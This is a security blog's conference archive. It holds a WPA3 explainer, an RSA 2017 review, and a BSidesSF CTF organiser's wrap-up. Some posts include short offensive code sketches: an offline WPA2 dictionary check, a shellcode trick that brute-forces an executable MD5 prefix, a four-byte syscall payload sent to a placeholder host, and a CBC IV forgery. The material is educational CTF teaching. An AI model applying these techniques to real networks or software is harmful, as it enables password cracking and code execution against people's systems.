Category Archives: conferences

HITB Security Conference in Amsterdam is all about advanced research

The agenda for Day 2 of the 9th annual HITB Security Conference in The Netherlands has been announced, with even more advanced research including new sandbox evasion techniques, a groundbreaking method for establishing covert channels over GSM mobile networks, a tool for backdooring cars, and much more. Reference This: Sandbox Evasion Using VBA Referencing. The sandbox, the last line of defense for many networks, isn't what it used to be. This talk shows how attackers …

HITB Security Conference in Amsterdam to feature innovative research on attack and defense topics

The agenda for Day 1 of the 9th annual HITB Security Conference in The Netherlands has been announced, and it's packed with cutting-edge research on a range of attack and defense topics, from cryptocurrencies to fuzzing and more. Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation). In this presentation, Daniel Bohannon, a Senior Applied Security Researcher with MANDIANT's Advanced Practices group, will dive deep into cmd.exe's multi-faceted obfuscation opportunities, beginning with …

WPA3 will secure Wi-Fi connections in four significant ways in 2018

CES, the annual consumer electronics extravaganza in Las Vegas, isn’t just a showcase for virtual reality and poorly-timed power outages. It’s also an opportunity to get a peek at the future of network security.

That’s why on the first day of CES, the Wi-Fi Alliance announced the newest security protocol for Wi-Fi devices: WPA3. The new protocol is the most significant upgrade to Wi-Fi security since WPA2 was ratified in 2004.

Details are thin, but the announcement outlined four new security capabilities that will protect wireless connections in the years to come.

1. Protection against brute force “dictionary” attacks

Despite a generation of irritated admins requesting that users choose stronger passwords, the most popular passwords are still common words like “password” or “football.” That makes networks vulnerable to simple brute force attacks that systematically submit every word in the dictionary as a password. Online tutorials of this Wi-Fi hack are trivially easy to find.
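
To make the mechanics concrete, here is a minimal Python sketch of why such offline attacks work against WPA2-PSK: the pairwise master key is derived deterministically from the passphrase and SSID, so candidate passwords can be tested without touching the network. (In a real attack the check is against the captured handshake's MIC rather than the PMK itself; the captured value, SSID, and wordlist below are made up for illustration.)

    import hashlib, hmac

    def derive_pmk(passphrase: str, ssid: str) -> bytes:
        # WPA2 PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

    # Pretend this value was recovered from a captured handshake.
    captured = derive_pmk("football", "CoffeeShopWiFi")

    for guess in ["password", "123456", "qwerty", "football", "letmein"]:
        if hmac.compare_digest(derive_pmk(guess, "CoffeeShopWiFi"), captured):
            print("password found:", guess)
            break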

WPA3 should make that issue a thing of the past by “delivering robust protections even when users choose passwords that fall short of typical complexity recommendations.” Some security experts have speculated that this refers to a type of key exchange called Dragonfly. According to the Internet Engineering Task Force (IETF), Dragonfly “employs discrete logarithm cryptography to perform an efficient exchange in a way that performs mutual authentication using a password that is probably resistant to an offline dictionary attack.”

2. Easier Internet of Things (IoT) security

WPA3 promises to “simplify the process of configuring security for devices that have limited or no display interface.” That’s a nod to the growing number of devices that are enhanced by network connections, such as smart door locks, home personal assistants, and (apparently) toothbrushes. Since IoT devices rarely have a graphical interface, it’s difficult to configure them for optimal security. You can’t type a password directly on a toothbrush, after all. This can naturally lead to less secure connections and vulnerable devices. Hackers could, for example, access your smart speakers and play whatever audio they want in your living room.

The Wi-Fi Alliance hasn’t yet offered details on how WPA3 overcomes this challenge. But researchers have successfully enhanced security on IoT devices by configuring them with a smartphone.

3. Stronger encryption

WPA2 uses 128-bit encryption keys. But WPA3 adds a stronger option: 192-bit encryption aligned with the Commercial National Security Algorithm (CNSA) Suite. This promises consumers the kind of beefier security that's currently used to protect governments and corporations.

4. Secure public Wi-Fi

Public Wi-Fi connections, like the kind you might use in a coffee shop or library, are always less secure than private ones. That's partly due to the inherent security limitations of open wireless networks, and partly due to the fact that librarians and coffee shop owners aren't typically network security masters. The new standards promise to "strengthen user privacy in open networks through individualized data encryption," though the announcement doesn't offer specifics on how that will be achieved.

Curiously, during its CES announcement, the Wi-Fi Alliance made no mention of KRACK, the vulnerability in WPA2 that impacted all Wi-Fi devices. However, Mathy Vanhoef, the researcher who discovered the vulnerability, wrote several enthusiastic tweets about WPA3.


In one, he speculates that WPA3 will include Opportunistic Wireless Encryption. This enables connection on an open network without a shared and public Pre-Shared Key (PSK). That’s important because a PSK can give hackers easy access to the Traffic Encryption Keys (TEKs), thus allowing them access to a data stream. In other words, the new protocol should help prevent hackers from snooping on your web browsing while you’re at Starbucks.
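
As a rough illustration of the idea (not the Wi-Fi Alliance's actual mechanism), Opportunistic Wireless Encryption boils down to an unauthenticated Diffie-Hellman exchange between each client and the access point, so every station derives its own traffic key instead of everyone sharing one public PSK. A sketch using X25519 from the third-party cryptography package:

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF

    # Each side generates an ephemeral key pair; no password is involved.
    ap_priv = X25519PrivateKey.generate()
    client_priv = X25519PrivateKey.generate()

    # They swap public keys and arrive at the same shared secret.
    client_secret = client_priv.exchange(ap_priv.public_key())
    ap_secret = ap_priv.exchange(client_priv.public_key())
    assert client_secret == ap_secret

    # Each client ends up with a unique traffic key, so other users of the
    # open network (and passive sniffers) can't decrypt this session.
    traffic_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                       info=b"owe-demo").derive(client_secret)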

Before we start to see the benefits of WPA3, the Wi-Fi Alliance has to certify hardware that uses the security protocol. So there’s no telling when people can start enjoying the enhanced security protections. But you shouldn’t be surprised if you start seeing devices that use the new protocol later this year.

Guest post by Logan Strain, author for Crimewire
Father, writer, and reformed Usenet troll. Lives in San Diego. Doesn’t surf, but should learn.
Follow Logan on Twitter @LM_Strain

The post WPA3 will secure Wi-Fi connections in four significant ways in 2018 appeared first on Malwarebytes Labs.

Virus Bulletin Publication And Presentation


The Virus Bulletin conference is a well-regarded, intimate technical conference focused on malware research. It provides a good balance between listening to technical talks and spending time exchanging experiences with colleagues from different companies, all working on the same task of making our computing environments more secure.

This past October, Talos participated at the Virus Bulletin conference in Madrid with a talk presented by Warren Mercer and me, Paul Rascagneres. This talk covered the latest techniques used in the reconnaissance phase of attacks by APT actors. During the presentation, we demonstrated how the reconnaissance phase is executed as a part of the infection process in order to protect valuable zero-day exploits, malware frameworks, and other tools.



Virus Bulletin requires selected speakers to submit a research paper which can later be used to help the security research community with their own research. Our submission to the conference was a paper titled "Modern reconnaissance phase by APT – protection layer". This paper is based on research conducted by Talos throughout the year and it is now publicly available on the Virus Bulletin web site.

If you missed it at the conference, our presentation is available on the Virus Bulletin YouTube channel. The recorded presentation provides a good overview of the paper, and will hopefully encourage you to read the full paper as well.

RSA USA 2017 In Review

Now that I've had a week to recover from the annual infosec circus event to end all circus events, I figured it's a good time to attempt being reflective and proffer my thoughts on the event, themes, what I saw, etc, etc, etc.

For starters, holy moly, 43,000+ people?!?!?!?!?! I mean... good grief... the event was about a quarter of that size a decade ago. If you've never been to RSA, or if you only started attending in the last couple of years, then it's really hard to describe how dramatic the change has been since ~2010, when the numbers started growing like this (to be fair, year-over-year growth from 2016 to 2017 wasn't all that huge).

With that... let's drill into my key highlights...

Size Matters

Why do people like me go to RSA? Because it's the one week in the year where I can see almost every single vendor in the industry, as well as see people I know and like who I otherwise would never get to see in person (aka "networking"). It truly is an enormous event, and it has definitely passed the threshold of being overwhelming. Several people I've known for years did not make the trip this year, and I suspect this will become a trend, but in the meantime, in many ways it's a "must attend" event.

The down-side to an event this large, and something I learned back in my Gartner days, is that - as someone with nearly 2 decades of industry experience - this is not an event where you're going to find much great content. Talks must, out of necessity, be tuned to the median audience, which means looking backward at what was cutting-edge 5-10 years ago. Sad, but true. There's simply not much room for cutting-edge thinking or discussion at the event anymore.

Soooo... why go back? Again, so long as there's business development and networking benefit, it is an essential event, but it's also very costly. Hotel pricing alone makes this an increasingly difficult prospect. For as much as we're spending on hotels each year, I could very likely visit friends in 3-4 different parts of the country and break even on travel costs. It's also increasingly a lot of noise, and much harder to sift value from that noise. I truly believe RSA is nearing the point where they'll have to either break the event into multiple events (kind of like 3 wks of SxSW), or they'll at least need to move to a different model where you're attending a conference within a conference (similar to "schools" within a large university). As it stands today, it's simply too easy to get lost in the shuffle and derive diminishing value.

Automation Nearing the Mainstream

We've been talking about security automation and orchestration for several years now, but it's often been with only a handful of examples, and it's generally been quite forward-looking. We're just now finally reaching the point where the automation message is being picked up in the mainstream and more expansive examples are emerging.

One thing I noticed this year is that "automation" was prevalent in many booths. There are now at least a dozen vendors purportedly in the space (up from the days of it being just Invotas (FireEye) and Phantom). No, I can't remember any names, but suffice to say, it's a growing list. Also, separately, I've noticed that orgs like Chef and Puppet have made an attempt to expand their automation appeal to security (not to mention ServiceNow doing the same).

The point here is this: The mainstream consensus is finally starting to catch up with the reality that we will never be able to scale human resources fast enough to successfully address the rapidly changing threat landscape. Thus, we absolutely must automate as much as possible. We don't need SOC analysts staring at screens, pushing buttons when a color changes from green to red. That can be automated. Instead, we need to think about these processes and make smart decisions about when and where a human actually needs to be in the loop. This is our future, which we should eagerly embrace because it then frees us up to do much more interesting and exciting things.

DevSecOps/Secure DevOps

Since we're talking about automation, it's only natural to pivot briefly into DevOps/DevSecOps/Secure DevOps. This year's Monday event on DevSecOps was ok, if somewhat repetitive. However, initial attendance was strong, and feedback has reportedly been good (the schedule got a bit foobar, so attendance declined after lunch; c'est la vie).

Here's what's important: Companies are continuing to reinvent how they operate, and DevOps is the underlying model. As such, we need to push hard to ensure that Dev and Ops teams have security responsibilities in their assigned duties, and that they are held accountable accordingly. A DevOps co-worker recently complained about this "DevSecOps" thing, and I pointed out that the entire reason for it is as a kludge because security has once again been left behind, and neither Dev nor Ops has taken on (or been assigned) security responsibilities, nor are they being held accountable for poor security decisions. THIS IS A CULTURAL FAILING THAT AFFECTS ALMOST EVERY SINGLE COMPANY AROUND.

In DevOps, the norm is always to point to "gold standard" examples like Netflix, Facebook, Etsy, etc. However, what people oftentimes forget in looking at these orgs is that, for the most part, they started out doing DevOps from the early days. There was very little need for cultural transformation because they were already operating in a DevOps manner. For companies that have been around for much, much, much longer, there will be internal opposition and institutional inertia that will slow down transformations. It's imperative that these cultural attributes be supplanted, aggressively if necessary, in order to remove barriers to change. DevOps provides an amazing template for operating an agile, efficient, effective organization... but only if companies fundamentally change how they function, including cultural transformation.

AI, ML, and Big Data Lies

If we were to take all the marketing at face value, then we'd be led to believe that the machines are thinking for themselves and we're a mere small step away from becoming part of The Matrix. Thankfully, that's not really true at all. The majority of companies claiming "AI" today are really being misleading and disingenuous. The simple fact is the majority of products are still based on heuristics or machine learning (ML) - sometimes both.

Heuristics are the traditional pattern matching we've seen for decades upon decades upon decades. Your traditional AV or IDS "solution"? It's primarily based on heuristically matching patterns and signatures to detect "a known bad thing." These are ok, but in the grand scheme they're providing little lasting value.

ML has emerged as an alternative: rather than looking for patterns, we instead model environments or behaviors, and then alert based on either matching or deviating from the models (sometimes both!). The ML approach is actually quite promising, though it's premised on the ability to actually create a discrete model of an environment or behavior. It is also imperative that ML engines constantly rebuild their models to account for changes in an environment or behavior (for example, imagine building a model of your diet starting in mid-October and running through the end of the year, and then trying to apply that same model to your diet from January through March, after you've made major life changes, perhaps as part of a New Year's resolution).
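
As a toy example of that model-and-alert-on-deviation idea (plain statistics standing in for a vendor's engine, with made-up numbers):

    import statistics

    # Baseline: outbound bytes per hour for a host during a training window.
    baseline = [120_000, 98_000, 110_000, 105_000, 130_000, 99_000, 115_000]
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline)

    def is_anomalous(observation: float, z_threshold: float = 3.0) -> bool:
        # Alert when a new observation deviates too far from the modeled behavior.
        return abs(observation - mean) > z_threshold * stdev

    print(is_anomalous(118_000))   # False: consistent with the model
    print(is_anomalous(950_000))   # True: a deviation worth a human's attention

    # As noted above, the model has to be rebuilt periodically so that
    # legitimate changes in behavior don't generate endless false alerts.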

There is a lot of hope in AI, ML, et al, and I think for good reason. Frankly, ML gives us a lot of value when applied to reasonably discrete environments (e.g., containers), and thus I think we'll continue to see great growth and success in this space. I expect that computing environments will also continue to evolve and grow to make modeling of them that much easier. I think there's much promise.

As for AI itself, we'll have to wait and see, but I suspect we're a good decade+ away from true examples of real-world applications. However, that said, if you're in a lower-level role (analyst, basic infrastructure config, etc.), then now is a good time to invest in training/education to improve your skills to raise yourself up to a higher-level job that will be less easily threatened by AI+automation. As I noted above, we really do not need SOC analysts staring at screens clicking buttons according to a set process. Machines can already do that today. Thus there's no job security in it. Instead, become the person who builds and trains these automation tools, or be the higher-level "fixer" who is activated once automation has done all the base enumeration and examination. The world is changing rapidly, and will look quite different in a decade.

The Threat Is Real / Ignore the FUD

One of my favorite tunes from last year is Megadeth's "The Threat Is Real" as it's really quite an appropriate phrase. Hacks are succeeding every day. Breaches are so commonplace that the mainstream media has all but lost interest in reporting on them. Incidents are inevitable. And, yet, in some ways they needn't be so inevitable; at least, not to the degree and severity we continually see. Whether it be massive DDoS attacks built on the back of woefully insecure IoT devices or sizable holes in cloud CDN infrastructure a la Cloudbleed, there are a lot of holes, a lot of bugs, and a lot of undertrained people, all of which will lead to bad days.

That said, we also need to be incredibly mindful and diligent to avoid the FUD. There's too much FUD. It's like running around telling us that "we're all gonna die" as if we don't all accept this as an inevitability. Come on, folks, let's get out of that red mental state (fear/panic/anger) and apply some rational thought. There are tons of things we can be doing to prepare and protect our organizations, our customers/clients, and our resources. We just need to take a deep breath, settle down, and execute.

What should we do? Well, interestingly, it's not all that strange a list. First and foremost, Basic Security Hygiene, which I wrote about while at Gartner nearly 2.5 years ago. Things like robust IAM (centralized, processized, monitored), vuln and patch mgmt, and applying consistent, secure standards for infrastructure and development are all great starting points. Beyond that, it comes down to taking the time to understand your environment and exposures, and investing in tools and techniques that will produce measurable results (measurement is key!!!). A progressive security awareness program can be critical to educating and incentivizing people to make better decisions, and really reflects the overall imperative to transform the business and its underlying culture. We can absolutely make things better, but it requires effort and thoughtfulness.
---

*whew* Ok... so, there you have it... my thoughts from RSA 2017. All told, it was a so-so week for me personally, but I'll definitely be back for one more year. TBD after that. It's really quite the circus these days. This year was especially difficult with how spread out things were (Moscone South has a major construction project underway, so the Marriott Marquis was enlisted). The wifi and mobile signals in the Marquis dungeon were nonexistent, which was painful. Also painful was the 4 spread out venues for Codebreaker's Bash on Thursday evening. It didn't work. Because people were spread all over, it was difficult to casually run into folks I was hoping to see. Hopefully next year they'll revert to a large single venue (I really, really, really enjoyed the Bash at AT&T Park, though many folks complained about it). Finding a venue for 43k+ people has to be incredibly challenging. Of course, so is finding a hotel room each year, so, ya know, there's that, too. Ha.

Hope you find this interesting/useful! Until next time...

BSidesSF CTF wrap-up

Welcome!

While this is technically a CTF writeup, like I frequently do, this one is going to be a bit backwards: this is for a CTF I ran, instead of one I played! I've gotta say, it's been a little while since I played in a CTF, but I had a really good time running the BSidesSF CTF! I just wanted to thank the other organizers - in alphabetical order - @bmenrigh, @cornflakesavage, @itsc0rg1, and @matir. I couldn't have done it without you folks!

BSidesSF CTF was a capture-the-flag challenge that ran in parallel with BSides San Francisco. It was designed to be easy/intermediate level, but we definitely had a few hair-pulling challenges.

The goal of this post is to explain a little bit of the motivation behind the challenges I wrote, and to give basic solutions. It's not going to have a step-by-step walkthrough of each challenge - though you might find that in the writeups list - but, rather, I'll cover what I intended to teach, and some interesting (to me :) ) trivia.

If you want to see the source of the challenges, our notes, and mostly everything else we generated as part of creating this CTF, you can find them here:

  • Original source code on GitHub
  • Google Drive notes (note that that's not the complete set of notes - some stuff (like comments from our meetings, brainstorming docs, etc) are a little too private, and contain ideas for future challenges :) )

Part of my goal for releasing all of our source + planning documents + deployment files is to a) show others how a CTF can be run, and b) encourage other CTF developers to follow suit and release their stuff!

As of this writing, the scoreboard and challenges are still online. We plan to keep them around for a couple more days before finally shutting them down.

Infrastructure

The rest of my team can most definitely confirm this: I'm not an infrastructure kinda guy. I was happy to write challenges, and relied on others for infrastructure bits. The only thing I did was write a Dockerfile for each of my challenges.

As such, I'll defer to my team on this part. I'm hoping that others on my team will post more details about the configurations, which I'll share on my Twitter feed. You can also find all the Dockerfiles and deployment scripts in our GitHub repository.

What I do know is, we used:

  • Google's CTF Scoreboard running on AppEngine for our scoreboard
  • Dockerfiles for each challenge that had an online component, and Docker for testing
  • docker-compose for testing
  • Kubernetes for deployment
  • Google Container Engine for running all of that in The Cloud

As I said, all the configurations are on GitHub. The infrastructure worked great: we had absolutely no traffic or load problems, and only very minor other issues.

I'm also super excited that Google graciously sponsored all of our Google Cloud expenses! The CTF weekend cost us roughly $500 - $600, and as of now we've spent a little over $800.

Players

Just a few numbers:

  • We had 728 teams register
  • We had 531 teams score at least one point
  • We had 354 teams score at least 100 points
  • We had 23 teams submit at least one on-site flag (presumably, that many teams played on-site)

Also, the top-10 teams were:

  • dcua :: 6773
  • OpenToAll :: 5178
  • scryptos :: 5093
  • Dragon Sector :: 4877
  • Antichat :: 4877
  • p4 :: 4777
  • khack40 :: 4677
  • squareroots :: 4643
  • ASIS :: 4427
  • Ox002147 :: 4397

The top-10 teams on-site were:

  • OpenToAll :: 5178
  • ▣ :: 3548
  • hash_slinging_hackers :: 3278
  • NeverTry :: 2912
  • 0x41434142 :: 2668
  • DevOps Solution :: 1823
  • Shadow Cats :: 1532
  • HOW BOU DAH :: 1448
  • Newbie :: 762
  • CTYS :: 694

The full list can be found on our CTFTime.org page.

On-site challenges

We had three on-site challenges (none of them created by me):

on-sight [1]

This was a one-point challenge designed simply to determine who's eligible for on-site prizes. We had a flag taped to the wall. Not super interesting. :)

(Speaking of prizes, I want to give a shout out to Synack for providing some prizes, and in particular for working with us on a fairly complex set-up for dealing with said prizes. :) )

Shared Secrets [250]

The Shared Secrets challenge was a last-minute idea. We wanted more on-site challenges, and other organizers on the CTF team came up with the idea of using Shamir's Secret Sharing scheme. We posted QR codes containing pieces of a secret around the venue.

It was a "3 of 6" scheme, so only three were actually needed to get the secret.
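
For anyone curious how a "3 of 6" split works, here is a minimal sketch over a prime field; the prime and secret are arbitrary, and this is not the code used at the event:

    import random

    P = 2**127 - 1  # a prime large enough for a small secret

    def split(secret, k=3, n=6):
        # Random polynomial of degree k-1 whose constant term is the secret.
        coeffs = [secret] + [random.randrange(P) for _ in range(k - 1)]
        return [(x, sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P)
                for x in range(1, n + 1)]

    def recover(shares):
        # Lagrange interpolation at x = 0 recovers the constant term.
        secret = 0
        for i, (xi, yi) in enumerate(shares):
            num = den = 1
            for j, (xj, _) in enumerate(shares):
                if i != j:
                    num = num * -xj % P
                    den = den * (xi - xj) % P
            secret = (secret + yi * num * pow(den, -1, P)) % P
        return secret

    shares = split(424242)
    print(recover(shares[:3]))  # any three of the six shares give back 424242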

The quotes on top of each image try to push people towards either "Shamir" or "ACM 22(11)". My favourite was, "Hi, hi, howdy, howdy, hi, hi! While everyone is minus, you could call me multiply", which is a line from a Shamir (the rapper) song. I did not determine if Shamir the rapper and Shamir the cryptographer were the same person. :)

Locker [150]

Locker is really cool! We basically set up a padlock with an Arduino and a receipt printer. After successfully picking the lock, you'd get a one-time-use flag printed out by the printer.

(We had some problems with submitting the flag early-on, because we forgot to build the database for the one-time-use flags, but got that resolved quickly!)

@bmenrigh developed the lock post, which detected the lock opening, and @matir developed the software for the receipt printer.

My challenges

I'm not going to go over others' challenges (other than the on-site ones I already covered), since I don't have the insight to make comments on them. However, I do want to cover all my challenges. Not a ton of detail, but enough to understand the context. I'll likely blog about a couple of them specifically later.

I probably don't need to say it, but: challenge spoilers coming!

'easy' challenges [10-40]

I wrote a series of what I called 'easy' challenges. They don't really have a trick to them, but teach a fundamental concept necessary to do CTFs. They're also a teaching tool that I plan to use for years to come. :)

easy [10] - a couldn't-be-easier reversing challenge. Asks for a password then prints out a flag. You can get both the password and the flag by running strings on the binary.

easyauth [30] - a web challenge that sets a cookie, and tells you it's setting a cookie. The cookie is simply 'username=guest'. If you change the cookie to 'username=administrator', you're given the flag. This is to force people to learn how to edit cookies in their browser.

easyshell [30] and easyshell64 [30] - these are both simple programs where you can send it shellcode, and they run it. It requires the player to figure out what shellcode is and how to use it (eg, from msfvenom or an online shellcode database). There's both a 32- and a 64-bit version, as well.

easyshell and easyshell64 are also good ways to test shellcode, and a place where people can grab libc binaries, if needed.

And finally, easycap [40] is a simple packet capture, where a flag is sent across the network one packet at a time. I didn't keep my generator, but it was essentially a Ruby script that did an s.send() on each byte of a string.
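
A rough reconstruction of what such a generator might look like, in Python rather than the original Ruby, with a placeholder flag, host, and port:

    import socket
    import time

    flag = "FLAG:this_is_a_placeholder"
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for ch in flag:
        # One byte per datagram, so each byte ends up in its own captured packet.
        s.sendto(ch.encode(), ("127.0.0.1", 4444))
        time.sleep(0.1)  # small gap so the packets are easy to follow in the pcap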

skipper [75] and skipper2 [200]

Now, we're starting to get into some of the levels that require some amount of specialized knowledge. I wrote skipper and skipper2 for an internal company CTF a long time ago, and have kept them around as useful teaching tools.

One of the first things I ever did in reverse engineering was write a registration bypass for some icon-maker program on 16-bit DOS using the debug.com command and some dumb luck. Something where you had to find the "Sorry, your registration code is invalid" message and bypass it. I wanted to simulate this, and that's where these came from.

With skipper, you can bypass the checks by just changing the program counter ($eip or $rip) or nop'ing out the checks. skipper2, however, incorporates the results from the checks into the final flag, so they can't be skipped quite so easily. Rather, you have to stop before each check and load the proper value into memory to get the flag. This simulates situations I've legitimately run into while writing keygens.

hashecute [100]

When I originally conceived of hashecute, I had imagined it being fairly difficult. The idea is, you can send any shellcode you want to the server, but you have to prepend the MD5 of the shellcode to it, and the prepended shellcode runs as well. That's gotta be hard, right? Making an MD5 that's executable??

Except it's not, really. You just need to make sure your checksum starts with a short jump to the end of the checksum (or to a NOP sled if you want to do it even faster!). That's \xeb\x0e (a short jmp) or \xe9 with a 4-byte offset (a near jmp), as the simplest examples (there are practically infinite others). And it's really easy to do that by just appending crap to the end of the shellcode: you can see that in my solution.
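
A minimal brute-force sketch of that trick, with a NOP sled standing in for real shellcode; since only two digest bytes are constrained, the loop converges after about 65,000 attempts on average:

    import hashlib
    import os

    shellcode = b"\x90" * 32  # placeholder NOP sled, not a real payload

    while True:
        # Junk suffix; real shellcode would end in a syscall so it's never reached.
        candidate = shellcode + os.urandom(4)
        digest = hashlib.md5(candidate).digest()
        if digest[:2] == b"\xeb\x0e":
            # \xeb\x0e jumps over the remaining 14 digest bytes into the shellcode.
            payload = digest + candidate  # what actually gets sent to the server
            print("junk suffix:", candidate[-4:].hex())
            break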

It does, however, teach a little critical thinking to somebody who might not be super accustomed to dealing with machine code, so I intend to continue using this one as a teaching tool. :)

b-64-b-tuff [100]

b-64-b-tuff has the dual honour of both having the stupidest name and being the biggest waste of my own time. :)

So, I came up with the idea of writing this challenge during a conversation with a friend: I said that I know people have written shellcode encoders for unicode and other stuff, but nobody had ever written one for Base64. We should make that a challenge!

So I spent a couple minutes writing the challenge. It's mostly just Base64 code from StackOverflow or something, and the rest is the same skeleton as easyshell/easyshell64.

Then I spent a few hours writing a pure Base64 shellcode encoder. I intend to do a future blog 100% about that process, because I think it's actually a kind of interesting problem. I eventually got to the point where it worked perfectly, and I was happy that I could prove that this was, indeed, solvable! So I gave it a stupid name and sent out my PR.

That's when I think @matir said, "isn't Base64 just a superset of alphanumeric?".

Yes. Yes it is. I could have used any off-the-shelf alphanumeric shellcode encoder such as msfvenom. D'OH!

But, the process was really interesting, and I do plan to write about it, so it's not a total loss. And I know at least one player did the same (hi @Grazfather! [he graciously shared his code where he encoded it all by hand]), so I feel good about that :-D

in-plain-sight [100]

I like to joke that I only write challenges to drive traffic to my blog. This is sort of the opposite: it rewards teams that read my blog. :)

A few months ago, while writing the delphi-status challenge (more on that one later), I realized that when encrypting data using a padding oracle, the last block can be arbitrarily chosen! I wrote about it in an off-handed sort of way at that time.

Shortly after, I realized that it could make a neat CTF challenge, and thus was born in-plain-sight.

It's kind of a silly little challenge. Like one of those puzzles you get in riddle books. The ciphertext was literally the string "HiddenCiphertext", which I tell you in the description, but of course you probably wouldn't notice that. When you do, it's a groaner. :)

Fun story: I had a guy from the team OpenToAll bring up the blog before we released the challenge, and mention how he was looking for a challenge involving plaintext ciphertext. I had to resist laughing, because I knew it was coming!

i-am-the-shortest [200]

This was a silly little level, which once again forces people to get shellcode. You're allowed to send up to 5 bytes of shellcode to the server, where the flag is loaded into memory, and the server executes them.

Obviously, 5 bytes isn't enough to do a proper syscall, so you have to be creative. It's more of a puzzle challenge than anything.

The trick is, I used a bunch of in-line assembly when developing the challenge (see the original source, it isn't pretty!) that ensures that the registers are basically set up to make a syscall - all you have to do is move esi (a pointer to the flag) into ecx. I later discovered that you can "link" variables to specific registers in gcc.

The intended method was for people to send \xcc for the shellcode (or similar) and to investigate the registers, determining what the state was, and then to use shellcode along the lines of xchg esi, ecx / int 0x80. And that's what most solvers I talked to did.

One fun thing: eax (which is the syscall number when a syscall is made) is set to len(shellcode) (the return value of read()). Since sys_write, the syscall you want to make, is number 4, you can easily trigger it by sending 4 bytes. If you send 5 bytes, it makes the wrong call.

Several of the solutions I saw had a dec eax instruction in them, however! The irony is, you only need that instruction because you have it. If you had just left it off, eax would already be 4!
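
Putting those pieces together, here is a sketch of the intended four-byte payload and one way to deliver it; the byte values are standard x86 encodings, and the host and port are placeholders:

    import socket

    # xchg ecx, esi -> 0x87 0xf1  (point ecx, the write() buffer, at the flag)
    # int 0x80      -> 0xcd 0x80  (eax is already 4 == sys_write, since read()
    #                              returned the 4 bytes we just sent)
    payload = b"\x87\xf1\xcd\x80"

    with socket.create_connection(("challenge.example", 1337)) as s:
        s.sendall(payload)
        print(s.recv(4096).decode(errors="replace"))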

delphi-status [250]

delphi-status was another of those levels where I spent way more time on the solution than on the challenge.

It seems common enough to see tools to decrypt data using a padding oracle, but not super common to see challenges where you have to encrypt data with a padding oracle. So I decided to create a challenge where you have to encrypt arbitrary data!

The original goal was to make somebody write a padding oracle encryptor tool for me. That seemed like a good idea!

But, I wanted to make sure this was do-able, and I was just generally curious, so I wrote it myself. Then I updated my tool Poracle to support encryption, and wrote a blog about it. If there wasn't a tool available that could encrypt arbitrary data with a padding oracle, I was going to hold back on releasing the code. But tools do exist, so I just released mine.

It turns out, there was a simpler solution: you could simply xor-out the data from the block when it's only one block, and xor-in arbitrary data. I don't have exact details, but I know it works. Basically, it's a classic stream-cipher-style attack.
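
My reading of that simpler approach, sketched below: with a single block, CBC decryption computes P = D(C) XOR IV, so you can leave the ciphertext alone and forge the IV to flip the plaintext into whatever you want (the sample strings are made up, and this may not be exactly what solvers did):

    def xor(a: bytes, b: bytes) -> bytes:
        return bytes(x ^ y for x, y in zip(a, b))

    iv = bytes(16)                           # IV delivered alongside the ciphertext
    known_plaintext = b"msg=hello world!"    # what the block currently decrypts to
    desired_plaintext = b"msg=I am admin!!"  # what we want it to decrypt to

    # The ciphertext block is untouched; only the IV changes.
    forged_iv = xor(iv, xor(known_plaintext, desired_plaintext))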

And that just demonstrates the Cryptographic Doom Principle :)

ximage [300]

ximage might be my favourite level. Some time ago - possibly years - I was chatting with a friend, and steganography came up. I wondered if it was possible to create an image where the very pixels were executable!?

I went home wondering if that was possible, and started trying to think of 3-byte NOP-equivalent instructions. I managed to think of a large number of workable combinations, including ones that modified registers I don't care about, plus combinations of 1- and 2-byte NOP-equivalents. By the end, I could reasonably do most colours in an image, including black (though it was slightly greenish) and white. You can find the code here.

(I got totally nerdsniped while writing this, and just spent a couple days trying to find every 3-byte NOP equivalent to see how much I can improve this!)

Originally, I just made the image data executable, so you'd have to ignore the header and run the image body. Eventually, I noticed that the bitmap header, 'BM', was effectively inc edx / dec ebp, which is a NOP as far as I'm concerned. That's followed by a 2-byte length value. I changed that length on every image to be \xeb\x32, which is effectively a jump to the end of the header. That also caused weird errors when reading the image, which I was totally fine with leaving as a hint.

So what you have is an image that's effectively shellcode; it can be loaded into memory and run. A steganographic method that has probably never been done. :)

beez-fight [350]

beez-fight was an item-duplication vulnerability that was modeled after a similar vulnerability in Diablo 2. I had a friend a lonnnng time ago who discovered a vulnerability in Diablo 2, where when you sold an item it was copied through a buffer, and that buffer could be sold again. I was trying to think of a similar vulnerability, where a buffer wasn't cleared correctly.

I started by writing a simple game engine. While I was creating items, locations, monsters, etc., I didn't really think about how the game was going to be played - browser? A binary I distribute? netcat? Distributing a binary can be fun, because the player has to reverse engineer the protocol. But netcat is easier! The problem is, the vulnerability has to be a bit more subtle in netcat, because I can't depend on a numbered buffer - what you see is what you get!

Eventually, I came upon the idea of equip/unequip being problematic. Not clearing the buffer properly!

Something I see far too much in real life is code that checks if an object exists in a different way in different places. So I decided to replicate that - I had both an item that's NULL-able, and a flag :is_equipped. When you tried to use an item, it would check if the :is_equipped flag is set. But when you unequipped it, it checked if the item was NULL, which never actually happened (unequipping it only toggled the flag). As a result, you could unequip the item multiple times and duplicate it!

Once that was done, the rest was easy: make a game that's too difficult to reasonably survive, and put a flag in the store that's worth a lot of gold. The only reasonable way to get the flag is to duplicate an item a bunch, then sell it to buy the flag.

I think I got the most positive feedback on this challenge, people seem to enjoy game hacking!

vhash + vhash-fixed [450]

This is a challenge that @bmenrigh and I came up with, designed to be quite difficult. It was vhash, and, later, vhash-fixed - but we'll get to that. :)

It all dates back to a conversation I had with @joswr1ght about a SANS Holiday Hack Challenge level I was designing. I suggested using a hash-extension vulnerability, and he said we can't, because of hash_extender, recklessly written by yours truly, ruining hash extension vulnerabilities forever!

I found that funny, and mentioned it to @bmenrigh. We decided to make our own novel hashing algorithm that's vulnerable to an extension attack. We decided to make it extra hard by not giving out source! Players would have to reverse engineer the algorithm in order to implement the extension attack. PERFECT! Nobody knows as well as me how difficult it can be to create a new hash extension attack. :)

